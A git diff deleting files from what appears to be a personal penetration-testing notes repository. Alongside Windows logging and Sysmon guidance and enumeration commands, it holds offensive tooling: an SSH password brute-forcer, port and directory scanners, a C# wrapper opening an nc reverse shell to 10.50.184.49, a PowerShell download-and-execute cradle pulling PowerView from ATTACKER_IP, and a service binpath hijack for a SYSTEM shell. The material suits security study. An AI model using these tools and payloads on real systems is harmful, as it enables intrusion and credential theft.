for send, receive in ans:
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

View File

@ -1,16 +0,0 @@
#!/usr/bin/env python
import requests
import sys
sub_dirs = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
sub_dirs = _f.read().splitlines()
for dir in sub_dirs:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code == 404:
pass
else:
print("Valid directory: ", dir_enum)

View File

@ -1,7 +0,0 @@
#!/usr/bin/env python
import requests
url = "https://download.sysinternals.com/files/PSTools.zip"
r = requests.get(url, allow_redirects=True)
open("PSTools.zip", 'wb').write(r.content)

@ -1 +0,0 @@
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e

View File

@ -1,2 +0,0 @@
#!/usr/bin/env bash
nc -zv $1 1-65535

View File

@ -1,35 +0,0 @@
#!/usr/bin/env python
import sys
import socket
import pyfiglet
print(pyfiglet.figlet_format("Port Scanner"))
ip = sys.argv[1]
open_ports = []
ports = range(1,10000)
def probe_port(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip,port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result
for port in ports:
sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)
if open_ports:
print("[+] Open Ports are: ")
print(sorted(open_ports))
else:
print("[-] No Open Ports")

View File

@ -1,5 +0,0 @@
#!/bin/bash
ports=(21 22 53 80 443 3306 8443 8080)
for port in ${ports[@]}; do
timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/$1/$port && echo $port is open || /dev/null"
done

View File

@ -1,22 +0,0 @@
#!/usr/bin/env python
import requests
import sys
subdomains = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
subdomains = _f.read().splitlines()
for sub in subdomains:
http_domain = f"http://{sub}.{sys.argv[1]}"
try:
requests.get(http_domain)
except requests.ConnectionError:
pass
else:
print("Valid domain: ", http_domain)

View File

@ -1,38 +0,0 @@
#!/usr/bin/env python
import paramiko
import sys
import os
target = str(input("IP address: "))
username = str(input("Username: "))
password_file = str(input("Location of password file: "))
def ssh_connect(password, code=0):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
ssh.close()
return code
with open(password_file, 'rb') as _f:
for line in _f.readlines():
password = line.strip()
print(password)
try:
response = ssh_connect(password)
if response == 0 :
print("[+] Password Found: " + password.decode())
exit(0)
if response == 1:
print("[-] Nothing Found")
except Exception as e:
print(e)
pass

@ -1 +0,0 @@
Subproject commit 776bd91259c081588f99b5b0b9aa54e8c5fdf5ad

@ -1 +0,0 @@
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a

View File

@ -1,13 +0,0 @@
using System;
using System.Diagnostics;
namespace Wrapper {
class Program {
static void Main (){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
proc.StartInfo = procInfo;
proc.Start();
}
}
}

View File

@ -1,3 +0,0 @@
# Bloodhound
* DNS

View File

@ -1,99 +0,0 @@
# Logging
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
## Loglevel
|ID|Event Type|Description|
|--|----------|-----------|
|0|Error|An event that indicates a significant problem.|
|1|Warning|An event that is not necessarily significant.|
|2|Information|An event describing the successful operation of an application.|
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
## Logrotation
```sh
C:\Windows\System32\winevt\Logs
```
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
## Tools
* Event Viewer (GUI-based application)
* Wevtutil.exe (command-line tool)
* Get-WinEvent (PowerShell cmdlet)
### wevtutil.exe
```sh
wevtutil.exe /?
```
* Count logs
```sh
wevtutil.exe le | measure
```
* Read three most recent Application logs
```sh
wevtutil qe Application /c:3 /rd:true /f:text
```
### Get-WinEvent
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
* List all the logs
```sh
Get-WinEvent -ListLog *
```
* Find string
```sh
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
```
* Further filtering
```sh
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
```
```sh
Get-WinEvent -ListProvider *Policy*
```
```sh
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
```
* Filter by hashtable values
```sh
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
```
```sh
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
```
* Including __XPATH__
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
```
```sh
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
```
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
```
* Find login by username
```sh
Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
```
### Command Line Logging
* Enable PS Logging
```sh
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
```
* CLI Process Auditing -- ID 4688
```
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
```

View File

@ -1,72 +0,0 @@
# Manual Windows Enumeration
## General Info
```sh
systeminfo
```
* Check installed updates
```sh
wmic qfe get Caption,Description
```
## Users
* `whoami /priv`
* `whoami /groups`
* `whoami /all`
* `net user`
* `net group`
* `net localgroup <groupname>`
* `net accounts`
* `net accounts /domain`
## Network Info
```sh
ipconfig
ipconfig /all
```
```sh
netstat -noba
```
```sh
arp -a
```
* Show shares
```sh
net share
```
## Services
```sh
net start
wmic service get name,version,vendor
```
### Non-Default Services
* Looking for non-default services:
```sh
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
```
* **Unquoted Service Path** Ideally there is a path without quotation
* Check which account the service the services run as
```sh
sc qc <ServiceName>
```
* Check if directory is writeable
```sh
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```

View File

@ -1,303 +0,0 @@
# Powershell Usage
## Get-Help
```
Get-Help Command-Name
```
* Show examples
```
Get-Help Command-Name -Examples
```
* Get-Command gets all the cmdlets installed on the current Computer.
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```
## Passing Output via Pipe
* A pipe passes object including methods and attributes.
```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```
## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects
## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value
## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```
## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```
```sh
Get-HotFix | Format-list | findstr <searchstring>
```
```sh
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
```
* Find backup files
```sh
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```
* Find file contents
```sh
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```
## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```
* Indexing lines
```sh
(Get-Content -Path file.txt)[index]
```
* Search
```sh
Select-String <filename> -Pattern <pattern>
```
## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```
## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```
## Count Words
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
```
## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```
## Current Working Directory
```
Get-Location
```
## File Metadata
```sh
ls | Format-List *
```
## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
* Webrequest and execute in one go
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```
## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```
## Enumeration
### Users
```
Get-LocalUser
```
* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```
* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```
### Network intel
* Connections
```sh
netstat -ano
```
* IP Address
```
Get-NetIpAddress
```
* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```
* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```
### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```
```sh
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
### Drivers
```sh
driverquery
```
### Processes
* Start processes
```sh
Start-Process <process>
```
* Running processes
```sh
Get-Process <process>
```
### Scheduled tasks
```sh
schtasks /query /fo LIST /v
```
```sh
Get-ScheduledTaskInfo
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```
### Alternate Data Stream(ADS)
* Show ADS
```sh
Get-Item -Path file.exe -Stream *
```
* Open ADS
```sh
wmic process call create $(Resolve-Path file.exe:streamname)
```
### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```
### ACL
* Owner of files
```
Get-ACL C:\
```
### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
```
### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```
### Antivirus
```sh
sc query windefend
```
* Service name unknown
```sh
sc queryex type=service
```
### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```
```sh
whoami /priv
```
```
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership
```

View File

@ -1,10 +0,0 @@
# RPCclient
* Enumerate users and groups
```sh
rpcclient <domain> <users>
rpcclient $> enumdomusers
...
rpcclient $> enumdomgroups
```

View File

@ -1,125 +0,0 @@
# Sysinternals and CLI usage
## Opening System Properties
```
sysdm.cpl
```
## Installing webdav server,
* Starting windows webclient service
```
get-service webclient
start-service webclient
```
* Opening NetworkAndSharingCenter
```
control.exe /name Microsoft.NetworkAndSharingCenter
```
## Make sure Network Discovery is enabled, advanced settings!
```
Install-WindowsFeature WebDAV-Redirector Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table Autosize
```
## Sigcheck
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a files status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
* Check for unsigned files in `C:\Windows\system32`
```
sigcheck -u -e C:\Windows\System32
```
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
* `-e` "Scan executable images only (regardless of their extension)"
## Alternate Data Stream (ADS)
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
```
streams file.txt
notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -stream ads.txt
```
## SDelete
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
## TCPView
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
```
tcpview
tcpvcon
```
## Autoruns
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
## Procdump
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
## Procdump
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
## Procmon
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
## Psexec
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
## Winobj
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
## BGInfo
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
## RegJump
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
```
regjump HKLM
```
* Similar to
```
reg query HKLM
```
```
Get-Item
Get-ItemProperty
```
## Strings
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
## Create a system authority shell
1. Check permissons
```sh
accesschk.exe /accepteula -uwcqv user <serviceName>
```
2. Query service
```sh
sq qc <service>
```
3. Set service config to the msfvenom reverse shell, uploaded previously.
```
sc config daclsvc binpath= "\"C:\shell.exe""
```
4. Start service and gain high priv shell
```sh
net start daclsvc
```
## Tips & Tricks
* [Sysinternal tools can be used without installing](https://live.sysinternals.com/)
* Execute through explorer via
```sh
\\live.sysinternals.com\tools
```

View File

@ -1,72 +0,0 @@
# Sysmon
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
## Paths
* Logfiles
```
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
```
## Configuration
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
## Installation
```sh
Downloads-SysInternalsTools C:\Sysinternals
```
## Best Practices
* Exclude, not include events
* CLI gives further control over filters
```sh
Get-WinEvent
```
```sh
wevutil.exe
```
* Know the env before implementation
## Filtering Events
* Actions -> Filter Current Log
### Filtering Events with Powershell
* Logged Events containing port 4444
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
```
* Logged Events containing lsass.exe
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
```
* Rats and C2
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
```
## Evasion Techniques
* Alternate Data Streams
* Injections
* Masquerading
* Packing/Compression
* Recompiling
* Obfuscation
* Anti-Reversing Techniques
* Remote Thread (OpenThread, ResumeThread)
### Detecting Evasion Techniques with Powershell
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
```

View File

@ -1,9 +0,0 @@
# Volume Shadow Copy Service
## Usage
```sh
vssadmin list volumes
```
```sh
vssadmin list shadows
```